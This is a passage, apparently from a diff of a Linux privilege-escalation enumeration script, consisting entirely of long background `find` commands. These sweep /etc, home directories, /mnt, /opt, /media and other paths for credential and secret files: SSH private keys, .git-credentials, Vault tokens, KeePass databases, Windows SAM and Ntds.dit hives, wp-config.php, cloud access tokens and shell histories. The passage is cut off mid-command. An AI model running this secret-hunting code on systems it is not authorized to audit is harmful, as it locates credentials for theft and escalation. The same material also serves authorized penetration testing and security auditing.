-o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"*knockd*\" -o -name \"azureProfile.json\" -o -name \"setupinfo.bak\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"ssh*config\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB=`eval_bckgrd "find /lib -name \"*.socket\" -o -name \"*.service\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.socket\" -o -name \"*.service\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.socket\" -o -name \"*.service\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd "find /media -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"sess_*\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find /private -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name 